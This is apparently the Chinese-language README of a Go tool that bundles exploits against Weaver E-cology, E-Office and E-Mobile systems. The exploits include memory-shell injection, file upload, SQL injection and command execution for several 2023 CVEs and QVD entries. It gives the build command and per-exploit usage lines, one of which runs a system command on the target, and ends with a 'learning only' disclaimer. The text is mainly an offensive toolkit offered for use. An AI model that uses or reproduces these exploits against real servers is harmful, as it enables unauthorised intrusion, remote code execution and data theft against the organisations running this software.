/WeaverExploit_All

泛微最近的漏洞利用工具(PS:2023)

Primary LanguageGo

WeaverExploit_All

泛微最近的漏洞利用工具(PS:2023)

集成了QVD-2023-5012CVE-2023-2523CVE-2023-2648getloginid_ofsLogin 漏洞利用

2023.7.26:新增:WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测

2023.8.05:新增泛微E-Office 信息泄露、未授权漏洞

2023.8.21:新增泛微E-Office 多个sql注入漏洞、E-cology HrmCareerApplyPerViewSQL注入漏洞

0x001 编译使用

go build -o WeaverExloit-All.exe .\main.go

0x002 使用方法

默认全部poc

WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p QVD-2023-5012
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p CVE-2023-2523
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p CVE-2023-2648
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p getloginid_ofsLogin
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p DeleteUserRequestInfoByXml
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p WorkFlowServiceXml
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p UploaderOperate
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p FileDownloadForOutDocSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p E_Mobile_client  -c ipconfig
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p EOfficeVUl
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p EOfficeSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p HrmCareerApplyPerViewSQL

image-20230626105738808

image-20230626110039351

image-20230626110207611

image-20230726142128257

dnslog 地址放到config/config.txt中

image-20230726105951498

image-20230807094313215

image-20230821090721048

image-20230821090909509

0x003 仅供测试使用

免责声明:本工具不得用于商业用途,仅做学习交流,如用作他途造成的一切后果请自行承担!